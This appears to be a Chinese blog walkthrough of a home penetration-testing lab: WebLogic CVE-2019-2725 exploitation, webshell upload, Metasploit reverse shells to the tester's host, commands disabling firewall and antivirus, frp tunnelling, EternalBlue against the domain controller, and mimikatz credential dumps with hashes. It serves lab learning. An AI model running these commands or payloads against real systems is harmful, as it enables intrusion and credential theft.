# 环境搭建

image-20220830194638425

WEB

密码: Asd123456789

网卡 : 一张 NAT,一张仅主机

WEB 主机以 administrator 第一次登录时没有密码,登录后会要求重新设置密码

image-20220830163801203

DC

密码 : 1qaz@WSX

网卡:仅主机

image-20220830163818539

PC

密码 : 1qaz@WSX

网卡 : 一张 NAT,一张仅主机

image-20220830163838647

# 内网

仅主机,子网改成 10.10.10.0,dhcp 记得一起改

image-20220830163552997

# 外网

NAT,子网改成 192.168.47.0,dhcp 记得一起改

image-20220830163644058

最后记得把 pc 和 web 的防火墙关一下,不然 ping 不通

# kali

我这配置好后 kali 没有分配 ip,手动添加一个

──(root㉿kali)-[~]
└─# cd /etc/network
                                                                                                              
┌──(root㉿kali)-[/etc/network]
└─# vi interfaces
                                                                                                              
┌──(root㉿kali)-[/etc/network]
└─# /etc/init.d/networking restart

image-20220830183623265

┌──(root㉿kali)-[/etc/network]
└─# ping baidu.com
PING baidu.com (39.156.66.10) 56(84) bytes of data.
64 bytes from 39.156.66.10 (39.156.66.10): icmp_seq=1 ttl=128 time=42.9 ms
64 bytes from 39.156.66.10 (39.156.66.10): icmp_seq=2 ttl=128 time=42.6 ms
^C
--- baidu.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 42.617/42.765/42.914/0.148 ms
                                                                                                              
┌──(root㉿kali)-[/etc/network]
└─# ping 192.168.47.129
PING 192.168.47.129 (192.168.47.129) 56(84) bytes of data.
64 bytes from 192.168.47.129: icmp_seq=1 ttl=64 time=0.986 ms
64 bytes from 192.168.47.129: icmp_seq=2 ttl=64 time=0.478 ms
64 bytes from 192.168.47.129: icmp_seq=3 ttl=64 time=0.387 ms
64 bytes from 192.168.47.129: icmp_seq=4 ttl=64 time=0.346 ms
64 bytes from 192.168.47.129: icmp_seq=5 ttl=64 time=3.34 ms
64 bytes from 192.168.47.129: icmp_seq=6 ttl=64 time=1.28 ms
64 bytes from 192.168.47.129: icmp_seq=7 ttl=64 time=0.399 ms
64 bytes from 192.168.47.129: icmp_seq=8 ttl=64 time=0.467 ms
64 bytes from 192.168.47.129: icmp_seq=9 ttl=64 time=0.359 ms
64 bytes from 192.168.47.129: icmp_seq=10 ttl=64 time=0.378 ms
64 bytes from 192.168.47.129: icmp_seq=11 ttl=64 time=0.300 ms
^C
--- 192.168.47.129 ping statistics ---
11 packets transmitted, 11 received, 0% packet loss, time 10145ms
rtt min/avg/max/mdev = 0.300/0.792/3.339/0.857 ms

# 开启 weblogic

image-20220830194750766

kali 里面访问

image-20220830194904076

即可

# 外网打点

# nmap 扫描

首先用 nmap 扫描一下目标 IP

nmap -sS -sV -Pn -T4 192.168.47.129
  • -sS 代表使用半开式 SYN 扫描,这种扫描方式很少在目标主机上留下扫描日志

  • -sV 代表版本探测,探测服务的版本

  • -Pn 代表穿过防火墙扫描

  • -T4 代表扫描时间间隔,设置速度等级,0-5 级,数字越大,扫描时间间隔越小,速度就越快。(T0-T2 串行扫描,T3-T5 并行扫描)

image-20220830195608562

  • 445 端口开放意味着存在 smb 服务,可能存在 ms17_010 永恒之蓝漏洞。

  • 7001 端口说明目标 IP 存在 weblogic 服务可能存在反序列化,SSRF, 任意文件上传,后台路径泄露

  • 开放 139 端口,就存在 Samba 服务,就可能存在爆破 / 未授权访问 / 远程命令执行漏洞

  • 开放 1433 端口,就存在 mssql 服务,可能存在爆破 / 注入 / SA 弱口令。

  • 开放 3389 端口,就存在远程桌面。

# weblogic 漏洞扫描

先看看 weblogic 是否存在漏洞

使用下面两个工具

https://github.com/rabbitmask/WeblogicScan

https://github.com/dr0op/WeblogicScan

┌──(kali㉿kali)-[/home/soft/WeblogicScan-master]
└─$ python3 WeblogicScan.py -u 192.168.47.129 -p 7001 
__        __   _     _             _        ____                  
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __  
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/ 
                             By Tide_RabbitMask | V 1.5 
Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
[*] =========Task Start=========
[+] [192.168.47.129:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.47.129:7001] Weblogic console address is exposed! The path is: http://192.168.47.129:7001/console/login/LoginForm.jsp
[+] [192.168.47.129:7001] Weblogic UDDI module is exposed! The path is: http://192.168.47.129:7001/uddiexplorer/
[-] [192.168.47.129:7001] weblogic not detected CVE-2016-0638
[-] [192.168.47.129:7001] weblogic not detected CVE-2016-3510
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-10271                                                           
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-3248                                                            
[-] [192.168.47.129:7001] weblogic not detected CVE-2017-3506                                                            
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2628                                                            
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2893                                                            
[-] [192.168.47.129:7001] weblogic not detected CVE-2018-2894                                                            
[+] [192.168.47.129:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725                                
[-] [192.168.47.129:7001] weblogic not detected CVE-2019-2729                                                            
[-] [192.168.47.129:7001] weblogic not detected CVE-2019-2890
[*] =========Task E n d=========

image-20220830200511066

┌──(kali㉿kali)-[/home/soft/WeblogicScan2]
└─$ python3 WeblogicScan.py  192.168.47.129 7001    
/home/soft/WeblogicScan2/app/platform.py:8: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if plugins is ():
__        __   _     _             _        ____                                                                         
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __                                                         
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \                                                        
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |                                                       
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|                                                       
                             |___/                                                                                       
      From WeblogicScan V1.2 Fixed by Ra1ndr0op: drops.org.cn | V 1.3.1                                                  
                                                                                                                         
Welcome To WeblogicScan !!
[*]开始检测 weblogic-console
[+]The target Weblogic console address is exposed!
[+]The path is: http://192.168.47.129:7001/console/login/LoginForm.jsp                                                   
[+]Please try weak password blasting!                                                                                    
[+]Weblogic后台路径存在
[*]开始检测 SSRF
[+]The target Weblogic UDDI module is exposed!
[+]The path is: http://192.168.47.129:7001/uddiexplorer/                                                                 
[+]Please verify the SSRF vulnerability!                                                                                 
[+]SSRF 漏洞存在
[*]开始检测 CVE20192725
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+]CVE-2019-2725 漏洞存在
[*]开始检测 CVE20192729
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[+]CVE-2019-2729 漏洞存在
[*]开始检测 CVE201710271
[-]Target weblogic not detected CVE-2017-10271
[*]开始检测 CVE20173506
[+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+]CVE-2017-3506 漏洞存在
[*]开始检测 CVE20192618
[-]口令爆破失败:weblogic/weblogic
[-]口令爆破失败:weblogic/weblogic1
[-]口令爆破失败:weblogic/weblogic10
[-]口令爆破失败:weblogic/weblogic123
[-]口令爆破失败:weblogic/Oracle@123
[-]target Weblogic is not Vul CVE-2019-2618
[*]开始检测 CVE20182894
[-]Target weblogic not detected CVE-2018-2894
[*]开始检测 CVE20182628
[-]CVE20182628 未成功检测,请检查网络连接或或目标存在负载中间件
[*]开始检测 CVE20182893
[-]CVE20182893 未成功检测,请检查网络连接或或目标存在负载中间件
[*]开始检测 CVE20160638
[-]Target weblogic not detected CVE-2016-0638
[*]开始检测 CVE20163510
[-]Target weblogic not detected CVE-2016-3510
[*]开始检测 CVE20173248
[-]Target weblogic not detected CVE-2017-3248

image-20220830201029834

# CVE-2019-2725

利用工具

https://www.aliyundrive.com/s/FqGpaqvHcGt

https://github.com/shack2/javaserializetools/releases

image-20220831094859120

然后上传 webshell,上传路径参考这里

https://www.cnblogs.com/sstfy/p/10350915.html

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

image-20220831112034658

冰蝎连接

image-20220831112219610

然后反弹 shell

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (58053 bytes) to 192.168.47.129
[*] Meterpreter session 1 opened (192.168.47.130:4444 -> 192.168.47.129:56397 ) at 2022-08-31 02:22:21 -0400

meterpreter > 

image-20220831142233610

反手顺便关下防火墙和杀软

netsh advfirewall set allprofiles state off 关闭防火墙

run killav 关闭杀软

image-20220831144905937

java 的 meterpreter 好像不提供关闭杀软服务

有一说一,java 的 meterpreter 似乎不太行,我换 msf 马上传

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 172.29.31.62
LHOST => 172.29.31.62
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o exp.exe
[*] Writing 7168 bytes to exp.exe...
    
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:5555

image-20220902104251838

# cs 上线

为了后面管理方便还是使用 cs

先生成监听

image-20220901122422494

可以用冰蝎直连

image-20220901122405151

另一种方法是生成 powershell 命令

image-20220901150447794

image-20220901150525511

不过冰蝎的这个命令执行会被 360 拦截,但是反弹 shell 连接 cs 不会

# 信息收集

# net 扫描

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等
net view /domain              // 查看域
net time /domain           // 主域服务器会同时作为时间服务器
net user /domain      // 查看域用户
net group /domain     // 查看域内用户组列表
net group "domain computers" /domain      // 查看域内的机器
net group "domain controllers" /domain          // 查看域控制器组
net group "Enterprise Admins" /domain    // 查看域管理员组

修改一下编码,看看 ip

image-20220831144403604

发现存在内网 ip 10.10.10.129

再查看域信息

net config workstation 

image-20220831142717089

可以知道我们在 de1ay.com 域里面,并且主机的 userAdministrator

查看域控

然后找域内主机

image-20220831143825741

ping 一下

image-20220831143923177

好像不是很对,换个方法

# fscan

上传 fscan.exe

image-20220901204340566

扫描一下内网

shell fscan.exe -h 10.10.10.129/24

但是吧

image-20220901205258145

# meterpreter 扫描

# 主机扫描

扫描存活主机

use auxiliary/scanner/netbios/nbname
set rhosts 10.10.10.0/24
run

image-20220904153715632

10.10.10.10 [DC] 
10.10.10.128 [PC]
10.10.10.129 [WEB]

我们目前就是 WEB

# 版本扫描

use auxiliary/scanner/smb/smb_version

set rhosts

run

不知道为啥只有 pc 的 445 扫描出来了

image-20220904154547523

# 横向移动

# DC

# frp 搭建 socks5 隧道

先上传 frp

image-20220901132522928

image-20220901132756323

然后修改配置

frpc.ini

[common]
server_addr = 192.168.47.130
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 1579
plugin = socks5

frps.ini

[common]
bind_port = 8000

image-20220901210846264

# 全局代理

用 proxychain

image-20220902112004085

proxychains4  msfdb run

# 永恒之蓝

因为 DC 是不出网,所以这里的 payload 需要为正向连接

msf6 > search ms17-010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce                                                                                                          
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[*] 10.10.10.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:135  ...  OK
[+] 10.10.10.10:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[*] 10.10.10.10:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.10:445 - The target is vulnerable.
[*] 10.10.10.10:445 - shellcode size: 1269
[*] 10.10.10.10:445 - numGroomConn: 12
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[*] 10.10.10.10:445 - Target OS: Windows Server 2012 R2 Standard 9600
[+] 10.10.10.10:445 - got good NT Trans response
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - got good NT Trans response
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - SMB1 session setup allocate nonpaged pool success
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - SMB1 session setup allocate nonpaged pool success
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:445  ...  OK
[+] 10.10.10.10:445 - good response status for nx: INVALID_PARAMETER
[+] 10.10.10.10:445 - good response status for nx: INVALID_PARAMETER
[*] Started bind TCP handler against 10.10.10.10:4444
[proxychains] Strict chain  ...  127.0.0.1:9876  ...  10.10.10.10:4444  ...  OK
[*] Sending stage (200262 bytes) to 10.10.10.10
[proxychains] DLL init: proxychains-ng 4.15
[*] Meterpreter session 2 opened (127.0.0.1:56250 -> 127.0.0.1:9876 ) at 2022-09-01 23:17:41 -0400
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter > ipconfig
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name         : Intel(R) 82574L 
Hardware MAC : 00:0c:29:ba:82:4f
MTU          : 1500
IPv4 Address : 10.10.10.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5873:29f:e4b6:93cc
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a0a
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter >

image-20220902112147754

这个 DC 第一次会蓝屏,重启之后再试一次就上线了

# 上线 cs

这里可以用 msf 派生 cs,但是这里直接用 msf 执行 cs 的后门

新建一个 listener

image-20220902143129494

然后生成后门

image-20220902143232171

接着用 msf 上传刚刚的 exe

image-20220902143635135

接着执行

image-20220902143827679

接着连接 DC 即可

connect 10.10.10.10 7777

image-20220902143940576

# 信息收集

# load kiwi

meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
meterpreter > creds_all 
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username  Domain  NTLM                              SHA1
--------  ------  ----                              ----
DC$       DE1AY   bf01e933765eb7687ebe25a33388d402  ac0ceafbfd5a7cb01fbbdaf3c76003ad5013afce
de1ay     DE1AY   161cff084477fe596a5db81874498a24  d669f3bccf14bf77d64667ec65aae32d2d10039d
wdigest credentials
===================
Username  Domain  Password
--------  ------  --------
(null)    (null)  (null)
DC$       DE1AY   (null)
de1ay     DE1AY   (null)
kerberos credentials
====================
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DC$       de1ay.com  fa 6a d6 82 bb f4 0c 99 d6 88 22 ef c0 bc e7 02 af 7f 13 45 ef 4b f8 08 c9 1b 08 60 36
                     ed 7b d7 47 76 fb 4f 39 50 3e 8f 09 75 34 3a ee 20 52 c1 03 60 bd 14 c7 fd a9 93 f9 02
                     bf a4 fd 9f ae e1 f2 09 2d 4e c4 40 22 39 68 ef 1b 64 66 20 50 f4 f4 17 ba ad b7 71 19
                     b6 b9 80 f9 1a 08 48 fb 86 e8 fc 2e bb d2 b6 8f 5c ce 70 ed 08 b5 b0 f4 e9 77 a3 4c 9b
                     05 e5 ad b3 07 42 42 d0 02 41 dc 82 9a 68 96 63 5a df c3 cd 48 19 c9 36 ed e1 4b 71 c2
                     8a 76 a5 1c 19 dd 3f 93 26 87 6e 99 a5 51 af 68 6b 8b 8b 80 5d 55 89 cb 51 2d fd ea 73
                     86 16 13 18 74 e8 e3 06 22 59 2d 17 e4 72 7a 7f eb b3 d6 50 e3 1b 62 3c 73 45 d0 23 f8
                     1a c5 de 40 6f 2d 6b 44 82 6b 8e 23 fe 23 1f 52 00 b3 be b6 5e 27 bd ce 5f ff 31 8d fd
                     b3 dc 8a f8 96 7e 11 c1
dc$       de1ay.com  fa 6a d6 82 bb f4 0c 99 d6 88 22 ef c0 bc e7 02 af 7f 13 45 ef 4b f8 08 c9 1b 08 60 36
                     ed 7b d7 47 76 fb 4f 39 50 3e 8f 09 75 34 3a ee 20 52 c1 03 60 bd 14 c7 fd a9 93 f9 02
                     bf a4 fd 9f ae e1 f2 09 2d 4e c4 40 22 39 68 ef 1b 64 66 20 50 f4 f4 17 ba ad b7 71 19
                     b6 b9 80 f9 1a 08 48 fb 86 e8 fc 2e bb d2 b6 8f 5c ce 70 ed 08 b5 b0 f4 e9 77 a3 4c 9b
                     05 e5 ad b3 07 42 42 d0 02 41 dc 82 9a 68 96 63 5a df c3 cd 48 19 c9 36 ed e1 4b 71 c2
                     8a 76 a5 1c 19 dd 3f 93 26 87 6e 99 a5 51 af 68 6b 8b 8b 80 5d 55 89 cb 51 2d fd ea 73
                     86 16 13 18 74 e8 e3 06 22 59 2d 17 e4 72 7a 7f eb b3 d6 50 e3 1b 62 3c 73 45 d0 23 f8
                     1a c5 de 40 6f 2d 6b 44 82 6b 8e 23 fe 23 1f 52 00 b3 be b6 5e 27 bd ce 5f ff 31 8d fd
                     b3 dc 8a f8 96 7e 11 c1
dc$       DE1AY.COM  (null)
de1ay     DE1AY.COM  (null)

image-20220902144301762

# net

net view一下

image-20220902150513127

看到 PC

# fscan 扫描

shell fscan.exe -h 10.10.10.10/24

image-20220902151750128

image-20220904184647015

发现 PC 端的 mssql 服务,并且爆出了账户密码,利用一下,但是有一说一我不知道为啥这里是 129,

# mdut

开启 socks 代理

image-20220902152033663

image-20220902152107978

image-20220904155507200

然后修改代理打开 mdut

image-20220904185901805

image-20220904184944722

但是我连不上

请我喝[茶]~( ̄▽ ̄)~*

miku233 微信支付

微信支付

miku233 支付宝

支付宝

miku233 贝宝

贝宝